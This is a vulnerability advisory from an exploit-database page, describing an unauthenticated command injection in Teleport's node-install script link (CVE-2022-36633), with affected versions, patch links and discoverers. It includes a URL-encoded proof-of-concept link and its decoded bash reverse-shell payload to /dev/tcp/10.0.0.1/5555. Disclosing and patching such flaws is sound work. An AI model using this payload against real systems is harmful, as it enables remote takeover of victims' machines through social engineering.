Share
## https://sploitus.com/exploit?id=PACKETSTORM:168137
Description:Teleport 9.3.6 is vulnerable to Command injection leading to Remote  
Code Execution. An attacker can craft a malicious ssh agent  
installation link by URL encoding a bash escape with carriage return  
line feed. This url encoded payload can be used in place of a token and  
sent to a user in a social engineering attack. This is fully  
unauthenticated attack utilizing the trusted teleport server to deliver  
the payload.  
  
Additional Information:https://goteleport.com/  
https://github.com/gravitational/teleport  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36633  
  
Vulnerability Type: otherCommand injection leading to Remote Code Execution  
  
Vendor of Product:Teleport - https://goteleport.com/  
Affected software version: Teleport version < v10.1.2  
  
Affected Component:https://teleport.examplesite.com/scripts/*INJECTION-POINT*/install-node.sh?method=iam <https://teleport.site.com/scripts/*INJECTION-POINT*/install-node.sh?method=iam>  
  
Attack Type:Remote  
  
Impact:Code Execution  
Impact Other:This vulnerability allows an attacker to inject code into a bash script without authentication, and craft a legitimate link hosted on the teleport server to use in social engineering attacks. When a user executes the command to install an teleport SSH agent with the crafted link, it will install the teleport agent and without the users knowledge, execute malicious code in the background.  
  
Attack Vectors:An attacker can craft a malicious ssh agent installation link by URL encoding a bash escape with carriage return line feed. This url encoded payload can be used in place of a token and sent to a user in a social engineering attack. This is fully unauthenticated attack utilizing the trusted teleport server to deliver the payload.  
  
Example POC payload: https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam <https://teleport.site.com/scripts/%22%0a%2fbin%2fbash%20-l%20%3e%20%2fdev%2ftcp%2f10.0.0.1%2f5555%200%3c%261%202%3e%261%20%23/install-node.sh?method=iam>  
  
Decoded payload:  
"  
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #  
  
Patch information:https://goteleport.com/docs/changelog/#1012  
https://github.com/gravitational/teleport/pull/14944  
------------------------------------------  
  
Discoverers:  
Brandon Roach & Brian Landrum  
  
------------------------------------------